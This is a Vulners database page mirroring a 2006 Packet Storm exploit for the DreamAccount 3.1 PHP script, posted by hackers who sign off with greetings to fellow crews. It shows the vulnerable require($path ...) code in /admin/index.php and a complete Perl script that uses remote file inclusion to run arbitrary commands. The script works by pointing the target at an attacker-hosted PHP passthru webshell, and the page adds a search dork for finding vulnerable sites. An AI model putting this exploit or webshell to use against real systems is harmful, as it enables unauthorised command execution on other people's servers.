Vulners
Lucene search
dreamaccount.txt
🗓️ 27 Jun 2006 00:00:00Reported by CrAsh_oVeR_rIdEType 
packetstorm🔗 packetstormsecurity.com👁 34 Views
`----------------------------------------------------
DREAMACCOUNT V3.1 Command Execution Exploit
----------------------------------------------------
Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)
Coded By Drago84(Exclusive Security Team)
----------------------------------------------------
site of script:http://dreamcost.com
----------------------------------------------------
Vulnerable: DREAMACCOUNT V3.1
----------------------------------------------------
vulnerable file :
------------------
/admin/index.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require($path . "setup.php");
require($path . "functions.php");
require($path . "payment_processing.inc.php");
$path parameter File inclusion
----------------------------------------------------
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
print "\n=============================================================================\r\n";
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";
print "=============================================================================\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive";
if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}
my $dir=$ARGV[1];
my $host=$ARGV[0];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
printf $1;
$response->content;
print "\n";
}
----------------------------------------------------------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Coded By Drago84
E-mail:[email protected]
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER
,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR AND ALL LEZR.COM Member
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4